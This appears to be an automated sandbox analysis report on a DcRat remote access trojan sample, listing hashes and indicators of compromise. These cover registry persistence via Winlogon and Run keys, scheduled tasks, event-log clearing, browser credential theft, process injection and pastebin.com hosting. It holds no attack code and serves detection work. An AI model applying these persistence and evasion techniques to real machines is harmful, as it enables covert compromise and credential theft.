dcrat | b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240

Analysis

max time kernel
151s
max time network
154s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
20-11-2024 08:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AstralprivateDLL.exe
Size

65.7MB
MD5

c9f4668c97eb480751e1bbf6173fc4e1
SHA1

528deade2bc88cafc26f78f7c73490b66abdf370
SHA256

b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240
SHA512

dd1d2499a2fca08181e43ea53138b3001d5674f2197c8962681bea188a07687feeb19b5bb8fb35e2339739e7df7b2bc2b2166bf02733bb3cf01f90571f874f41
SSDEEP

196608:27H3VIb7wjJfQqkGCaG1R8uzSJzbwHyokFpz/ehFCIUmF4tDDnYdBaUqkM9h8:s6vwmRR85JPwHyjIgIPCRnYBY

Score

10^/10

dcrat defense_evasion discovery evasion execution infostealer persistence rat spyware stealer

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Modifies WinLogon for persistence 2 TTPs 6 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

ServerComponenthostMonitorDll.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\schemas\\dllhost.exe\", \"C:\\Recovery\\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\\dwm.exe\", \"C:\\Program Files\\Windows Journal\\en-US\\Idle.exe\", \"C:\\Recovery\\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\\sppsvc.exe\", \"C:\\Windows\\addins\\WmiPrvSE.exe\", \"C:\\containerperf\\ServerComponenthostMonitorDll.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\schemas\\dllhost.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\schemas\\dllhost.exe\", \"C:\\Recovery\\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\\dwm.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\schemas\\dllhost.exe\", \"C:\\Recovery\\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\\dwm.exe\", \"C:\\Program Files\\Windows Journal\\en-US\\Idle.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\schemas\\dllhost.exe\", \"C:\\Recovery\\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\\dwm.exe\", \"C:\\Program Files\\Windows Journal\\en-US\\Idle.exe\", \"C:\\Recovery\\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\\sppsvc.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\schemas\\dllhost.exe\", \"C:\\Recovery\\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\\dwm.exe\", \"C:\\Program Files\\Windows Journal\\en-US\\Idle.exe\", \"C:\\Recovery\\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\\sppsvc.exe\", \"C:\\Windows\\addins\\WmiPrvSE.exe\""	ServerComponenthostMonitorDll.exe

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

svchost.exe

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection	svchost.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP	svchost.exe

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1500	2328	schtasks.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1920	2328	schtasks.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2976	2328	schtasks.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2872	2328	schtasks.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3008	2328	schtasks.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2368	2328	schtasks.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	536	2328	schtasks.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1912	2328	schtasks.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2096	2328	schtasks.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	596	2328	schtasks.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2288	2328	schtasks.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2656	2328	schtasks.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2300	2328	schtasks.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1020	2328	schtasks.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1636	2328	schtasks.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1000	2328	schtasks.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2580	2328	schtasks.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2424	2328	schtasks.exe	38

Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs

Processes:

twain_32.exeupdater.exe

description	pid	Process	procid_target
PID 2600 created 1212	2600	twain_32.exe	21
PID 2600 created 1212	2600	twain_32.exe	21
PID 2600 created 1212	2600	twain_32.exe	21
PID 2600 created 1212	2600	twain_32.exe	21
PID 2600 created 1212	2600	twain_32.exe	21
PID 2600 created 1212	2600	twain_32.exe	21
PID 3032 created 1212	3032	updater.exe	21
PID 3032 created 1212	3032	updater.exe	21
PID 3032 created 1212	3032	updater.exe	21
PID 3032 created 1212	3032	updater.exe	21
PID 3032 created 1212	3032	updater.exe	21
PID 3032 created 1212	3032	updater.exe	21
PID 3032 created 1212	3032	updater.exe	21

Command and Scripting Interpreter: PowerShell 1 TTPs 23 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2428	powershell.exe
640	powershell.exe
1772	powershell.exe
944	powershell.exe
1032	powershell.exe
1480	powershell.exe
1060	powershell.exe
1820	powershell.exe
1508	powershell.exe
2420	powershell.exe
1036	powershell.exe
968	powershell.exe
2732	powershell.exe
1112	powershell.exe
2584	powershell.exe
1776	powershell.exe
2164	powershell.exe
2956	powershell.exe
2876	powershell.exe
888	powershell.exe
2496	powershell.exe
620	powershell.exe
2792	powershell.exe

Disables Task Manager via registry modification
evasion
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 5 IoCs

Processes:

Astral private DLL.exetwain_32.exeServerComponenthostMonitorDll.exeIdle.exeupdater.exe

pid	Process
400	Astral private DLL.exe
2600	twain_32.exe
2828	ServerComponenthostMonitorDll.exe
2192	Idle.exe
3032	updater.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

Processes:

svchost.exe

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx	svchost.exe

Loads dropped DLL 5 IoCs

Processes:

AstralprivateDLL.execmd.exetaskeng.exe

pid	Process
2360	AstralprivateDLL.exe
2360	AstralprivateDLL.exe
2932	cmd.exe
2932	cmd.exe
2276	taskeng.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

ServerComponenthostMonitorDll.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\ServerComponenthostMonitorDll = "\"C:\\containerperf\\ServerComponenthostMonitorDll.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\schemas\\dllhost.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Program Files\\Windows Journal\\en-US\\Idle.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Recovery\\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\\sppsvc.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\addins\\WmiPrvSE.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Recovery\\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\\sppsvc.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\addins\\WmiPrvSE.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ServerComponenthostMonitorDll = "\"C:\\containerperf\\ServerComponenthostMonitorDll.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\schemas\\dllhost.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\\dwm.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\\dwm.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Program Files\\Windows Journal\\en-US\\Idle.exe\""	ServerComponenthostMonitorDll.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

Processes:

flow	ioc
9	pastebin.com
10	pastebin.com

Power Settings 1 TTPs 10 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

Processes:

powercfg.exepowercfg.execmd.exepowercfg.exepowercfg.execmd.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid	Process
1360	powercfg.exe
2148	powercfg.exe
1640	cmd.exe
1272	powercfg.exe
2936	powercfg.exe
2036	cmd.exe
2676	powercfg.exe
1300	powercfg.exe
2892	powercfg.exe
2820	powercfg.exe

Drops file in System32 directory 8 IoCs

Processes:

csc.exepowershell.exepowershell.exesvchost.exepowershell.exepowershell.exe

description	ioc	Process
File created	\??\c:\Windows\System32\_f1q_j.exe	csc.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC	svchost.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	\??\c:\Windows\System32\CSC1090B04C6D9E4F1BA7A1E161AD8F0D1.TMP	csc.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

twain_32.exeupdater.exe

description	pid	Process	procid_target
PID 2600 set thread context of 968	2600	twain_32.exe	114
PID 3032 set thread context of 2172	3032	updater.exe	138
PID 3032 set thread context of 2468	3032	updater.exe	145
PID 3032 set thread context of 2700	3032	updater.exe	146

Drops file in Program Files directory 4 IoCs

Processes:

ServerComponenthostMonitorDll.exetwain_32.exeupdater.exe

description	ioc	Process
File created	C:\Program Files\Windows Journal\en-US\Idle.exe	ServerComponenthostMonitorDll.exe
File created	C:\Program Files\Windows Journal\en-US\6ccacd8608530f	ServerComponenthostMonitorDll.exe
File created	C:\Program Files\Google\Chrome\updater.exe	twain_32.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Drops file in Windows directory 6 IoCs

Processes:

ServerComponenthostMonitorDll.exesvchost.exe

description	ioc	Process
File created	C:\Windows\addins\24dbde2999530e	ServerComponenthostMonitorDll.exe
File created	C:\Windows\schemas\dllhost.exe	ServerComponenthostMonitorDll.exe
File created	C:\Windows\schemas\5940a34987c991	ServerComponenthostMonitorDll.exe
File opened for modification	C:\Windows\appcompat\programs\RecentFileCache.bcf	svchost.exe
File created	C:\Windows\addins\WmiPrvSE.exe	ServerComponenthostMonitorDll.exe
File opened for modification	C:\Windows\addins\WmiPrvSE.exe	ServerComponenthostMonitorDll.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
2096	sc.exe
2980	sc.exe
1932	sc.exe
2668	sc.exe
1920	sc.exe
1012	sc.exe
1656	sc.exe
1864	sc.exe
2268	sc.exe
2892	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

AstralprivateDLL.exeAstral private DLL.exeWScript.execmd.exereg.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AstralprivateDLL.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Astral private DLL.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

PING.EXE

pid	Process
2160	PING.EXE

Modifies data under HKEY_USERS 6 IoCs

Processes:

dialer.exepowershell.exe

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c07b2f57253bdb01	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates	dialer.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
2840	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

PING.EXE

pid	Process
2160	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 20 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

pid	Process
2872	schtasks.exe
2580	schtasks.exe
2368	schtasks.exe
2288	schtasks.exe
2656	schtasks.exe
2344	schtasks.exe
2244	schtasks.exe
1500	schtasks.exe
2976	schtasks.exe
3008	schtasks.exe
2424	schtasks.exe
2096	schtasks.exe
2300	schtasks.exe
1020	schtasks.exe
596	schtasks.exe
1636	schtasks.exe
1000	schtasks.exe
1920	schtasks.exe
536	schtasks.exe
1912	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

ServerComponenthostMonitorDll.exe

pid	Process
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe
2828	ServerComponenthostMonitorDll.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

ServerComponenthostMonitorDll.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeIdle.exepowershell.exepowercfg.exedialer.exepowershell.exepowercfg.exepowercfg.exepowercfg.exesvchost.exe

description	pid	Process
Token: SeDebugPrivilege	2828	ServerComponenthostMonitorDll.exe
Token: SeDebugPrivilege	1060	powershell.exe
Token: SeDebugPrivilege	2876	powershell.exe
Token: SeDebugPrivilege	1032	powershell.exe
Token: SeDebugPrivilege	944	powershell.exe
Token: SeDebugPrivilege	1508	powershell.exe
Token: SeDebugPrivilege	2496	powershell.exe
Token: SeDebugPrivilege	1480	powershell.exe
Token: SeDebugPrivilege	1772	powershell.exe
Token: SeDebugPrivilege	2956	powershell.exe
Token: SeDebugPrivilege	968	powershell.exe
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeDebugPrivilege	888	powershell.exe
Token: SeDebugPrivilege	1112	powershell.exe
Token: SeDebugPrivilege	2584	powershell.exe
Token: SeDebugPrivilege	620	powershell.exe
Token: SeDebugPrivilege	1776	powershell.exe
Token: SeDebugPrivilege	1820	powershell.exe
Token: SeDebugPrivilege	2732	powershell.exe
Token: SeDebugPrivilege	1036	powershell.exe
Token: SeDebugPrivilege	2192	Idle.exe
Token: SeDebugPrivilege	2164	powershell.exe
Token: SeShutdownPrivilege	1300	powercfg.exe
Token: SeDebugPrivilege	968	dialer.exe
Token: SeDebugPrivilege	2428	powershell.exe
Token: SeShutdownPrivilege	1272	powercfg.exe
Token: SeShutdownPrivilege	2892	powercfg.exe
Token: SeShutdownPrivilege	2936	powercfg.exe
Token: SeAssignPrimaryTokenPrivilege	852	svchost.exe
Token: SeIncreaseQuotaPrivilege	852	svchost.exe
Token: SeSecurityPrivilege	852	svchost.exe
Token: SeTakeOwnershipPrivilege	852	svchost.exe
Token: SeLoadDriverPrivilege	852	svchost.exe
Token: SeSystemtimePrivilege	852	svchost.exe
Token: SeBackupPrivilege	852	svchost.exe
Token: SeRestorePrivilege	852	svchost.exe
Token: SeShutdownPrivilege	852	svchost.exe
Token: SeSystemEnvironmentPrivilege	852	svchost.exe
Token: SeUndockPrivilege	852	svchost.exe
Token: SeManageVolumePrivilege	852	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	852	svchost.exe
Token: SeIncreaseQuotaPrivilege	852	svchost.exe
Token: SeSecurityPrivilege	852	svchost.exe
Token: SeTakeOwnershipPrivilege	852	svchost.exe
Token: SeLoadDriverPrivilege	852	svchost.exe
Token: SeSystemtimePrivilege	852	svchost.exe
Token: SeBackupPrivilege	852	svchost.exe
Token: SeRestorePrivilege	852	svchost.exe
Token: SeShutdownPrivilege	852	svchost.exe
Token: SeSystemEnvironmentPrivilege	852	svchost.exe
Token: SeUndockPrivilege	852	svchost.exe
Token: SeManageVolumePrivilege	852	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	852	svchost.exe
Token: SeIncreaseQuotaPrivilege	852	svchost.exe
Token: SeSecurityPrivilege	852	svchost.exe
Token: SeTakeOwnershipPrivilege	852	svchost.exe
Token: SeLoadDriverPrivilege	852	svchost.exe
Token: SeSystemtimePrivilege	852	svchost.exe
Token: SeBackupPrivilege	852	svchost.exe
Token: SeRestorePrivilege	852	svchost.exe
Token: SeShutdownPrivilege	852	svchost.exe
Token: SeSystemEnvironmentPrivilege	852	svchost.exe
Token: SeUndockPrivilege	852	svchost.exe
Token: SeManageVolumePrivilege	852	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

AstralprivateDLL.exeAstral private DLL.exeWScript.execmd.exeServerComponenthostMonitorDll.execsc.exe

description	pid	Process	procid_target
PID 2360 wrote to memory of 400	2360	AstralprivateDLL.exe	31
PID 2360 wrote to memory of 400	2360	AstralprivateDLL.exe	31
PID 2360 wrote to memory of 400	2360	AstralprivateDLL.exe	31
PID 2360 wrote to memory of 400	2360	AstralprivateDLL.exe	31
PID 2360 wrote to memory of 2600	2360	AstralprivateDLL.exe	32
PID 2360 wrote to memory of 2600	2360	AstralprivateDLL.exe	32
PID 2360 wrote to memory of 2600	2360	AstralprivateDLL.exe	32
PID 2360 wrote to memory of 2600	2360	AstralprivateDLL.exe	32
PID 400 wrote to memory of 2788	400	Astral private DLL.exe	33
PID 400 wrote to memory of 2788	400	Astral private DLL.exe	33
PID 400 wrote to memory of 2788	400	Astral private DLL.exe	33
PID 400 wrote to memory of 2788	400	Astral private DLL.exe	33
PID 2788 wrote to memory of 2932	2788	WScript.exe	34
PID 2788 wrote to memory of 2932	2788	WScript.exe	34
PID 2788 wrote to memory of 2932	2788	WScript.exe	34
PID 2788 wrote to memory of 2932	2788	WScript.exe	34
PID 2932 wrote to memory of 2840	2932	cmd.exe	36
PID 2932 wrote to memory of 2840	2932	cmd.exe	36
PID 2932 wrote to memory of 2840	2932	cmd.exe	36
PID 2932 wrote to memory of 2840	2932	cmd.exe	36
PID 2932 wrote to memory of 2828	2932	cmd.exe	37
PID 2932 wrote to memory of 2828	2932	cmd.exe	37
PID 2932 wrote to memory of 2828	2932	cmd.exe	37
PID 2932 wrote to memory of 2828	2932	cmd.exe	37
PID 2828 wrote to memory of 2432	2828	ServerComponenthostMonitorDll.exe	42
PID 2828 wrote to memory of 2432	2828	ServerComponenthostMonitorDll.exe	42
PID 2828 wrote to memory of 2432	2828	ServerComponenthostMonitorDll.exe	42
PID 2432 wrote to memory of 2992	2432	csc.exe	44
PID 2432 wrote to memory of 2992	2432	csc.exe	44
PID 2432 wrote to memory of 2992	2432	csc.exe	44
PID 2828 wrote to memory of 1032	2828	ServerComponenthostMonitorDll.exe	60
PID 2828 wrote to memory of 1032	2828	ServerComponenthostMonitorDll.exe	60
PID 2828 wrote to memory of 1032	2828	ServerComponenthostMonitorDll.exe	60
PID 2828 wrote to memory of 1036	2828	ServerComponenthostMonitorDll.exe	61
PID 2828 wrote to memory of 1036	2828	ServerComponenthostMonitorDll.exe	61
PID 2828 wrote to memory of 1036	2828	ServerComponenthostMonitorDll.exe	61
PID 2828 wrote to memory of 1480	2828	ServerComponenthostMonitorDll.exe	62
PID 2828 wrote to memory of 1480	2828	ServerComponenthostMonitorDll.exe	62
PID 2828 wrote to memory of 1480	2828	ServerComponenthostMonitorDll.exe	62
PID 2828 wrote to memory of 1060	2828	ServerComponenthostMonitorDll.exe	63
PID 2828 wrote to memory of 1060	2828	ServerComponenthostMonitorDll.exe	63
PID 2828 wrote to memory of 1060	2828	ServerComponenthostMonitorDll.exe	63
PID 2828 wrote to memory of 2956	2828	ServerComponenthostMonitorDll.exe	64
PID 2828 wrote to memory of 2956	2828	ServerComponenthostMonitorDll.exe	64
PID 2828 wrote to memory of 2956	2828	ServerComponenthostMonitorDll.exe	64
PID 2828 wrote to memory of 1820	2828	ServerComponenthostMonitorDll.exe	65
PID 2828 wrote to memory of 1820	2828	ServerComponenthostMonitorDll.exe	65
PID 2828 wrote to memory of 1820	2828	ServerComponenthostMonitorDll.exe	65
PID 2828 wrote to memory of 1508	2828	ServerComponenthostMonitorDll.exe	66
PID 2828 wrote to memory of 1508	2828	ServerComponenthostMonitorDll.exe	66
PID 2828 wrote to memory of 1508	2828	ServerComponenthostMonitorDll.exe	66
PID 2828 wrote to memory of 2792	2828	ServerComponenthostMonitorDll.exe	67
PID 2828 wrote to memory of 2792	2828	ServerComponenthostMonitorDll.exe	67
PID 2828 wrote to memory of 2792	2828	ServerComponenthostMonitorDll.exe	67
PID 2828 wrote to memory of 968	2828	ServerComponenthostMonitorDll.exe	68
PID 2828 wrote to memory of 968	2828	ServerComponenthostMonitorDll.exe	68
PID 2828 wrote to memory of 968	2828	ServerComponenthostMonitorDll.exe	68
PID 2828 wrote to memory of 2732	2828	ServerComponenthostMonitorDll.exe	69
PID 2828 wrote to memory of 2732	2828	ServerComponenthostMonitorDll.exe	69
PID 2828 wrote to memory of 2732	2828	ServerComponenthostMonitorDll.exe	69
